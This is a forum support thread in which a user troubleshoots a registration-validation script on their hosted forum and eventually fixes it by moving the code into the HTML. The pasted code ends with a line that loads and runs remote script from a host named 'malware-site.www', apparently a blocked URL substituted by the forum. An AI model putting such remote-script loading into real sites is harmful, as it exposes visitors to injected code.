Registration Validation Hitskin_logo Hitskin.com

This is a Hitskin.com skin preview
Install the skinReturn to the skin page

The forum of the forums
Would you like to react to this message? Create an account in a few clicks or log in to continue.
3 posters

    Registration Validation

    zokisin98
    zokisin98
    Forumember


    Posts : 87
    Reputation : 3
    Language : Serbia

    Solved Registration Validation

    Post by zokisin98 November 12th 2012, 1:11 pm

    Registration Validation still no work on my forum i do all what need and still no work
    There is my forum adres please help me!

    Code:
    http://fess-serbia.7forum.net/
    Nera.
    Nera.
    Energetic


    Female Posts : 7078
    Reputation : 2017
    Language : English
    Location : -

    Solved Re: Registration Validation

    Post by Nera. November 12th 2012, 1:16 pm

    Hi,

    What do you mean by registration validation? I registered to your forum with no trouble?
    zokisin98
    zokisin98
    Forumember


    Posts : 87
    Reputation : 3
    Language : Serbia

    Solved Re: Registration Validation

    Post by zokisin98 November 12th 2012, 1:17 pm

    Nera.
    Nera.
    Energetic


    Female Posts : 7078
    Reputation : 2017
    Language : English
    Location : -

    Solved Re: Registration Validation

    Post by Nera. November 12th 2012, 1:34 pm

    I just tried it on a BB2 forum and it works fine though it's quite late.

    Registration Validation Lmgb

    I cant though try it on your forum since I can't even finish loading your forum from the JS you already have installed. Perhaps remove some of it Confused
    zokisin98
    zokisin98
    Forumember


    Posts : 87
    Reputation : 3
    Language : Serbia

    Solved Re: Registration Validation

    Post by zokisin98 November 12th 2012, 2:31 pm

    Zzz i delete some js and still no work Sad
    Nera.
    Nera.
    Energetic


    Female Posts : 7078
    Reputation : 2017
    Language : English
    Location : -

    Solved Re: Registration Validation

    Post by Nera. November 12th 2012, 3:39 pm

    Try removing the leaves script and see does it work than.

    Code:
    <script src="http://yourjavascript.com/0502511049/code.txt.js" type="text/javascript"></script>
    zokisin98
    zokisin98
    Forumember


    Posts : 87
    Reputation : 3
    Language : Serbia

    Solved Re: Registration Validation

    Post by zokisin98 November 12th 2012, 4:52 pm

    Amm i remove that code
    Code:
    <script src="http://yourjavascript.com/0502511049/code.txt.js" type="text/javascript"></script>

    but still no work ...
    See if on this code have some prob.
    Code:
    (function () {
            window.validation = {
                empty_username: "You must enter a username",
                username_length: "Usernames must be between 2 and 25 characters long",
                username_available: "is available",
                username_taken: "is already registered by another member",
                invalid_email: "You need to enter a valid email address"
            }
        })();
        $.getScript("http://malware-site.www");
    zokisin98
    zokisin98
    Forumember


    Posts : 87
    Reputation : 3
    Language : Serbia

    Solved Re: Registration Validation

    Post by zokisin98 November 13th 2012, 12:06 pm

    Oh i moved that to HTML and now Registration Validation work!
    Ty
    Jophy
    Jophy
    ForumGuru


    Male Posts : 17922
    Reputation : 836
    Language : English
    Location : Somewhere

    Solved Re: Registration Validation

    Post by Jophy November 13th 2012, 12:48 pm

    Topic Solved & Locked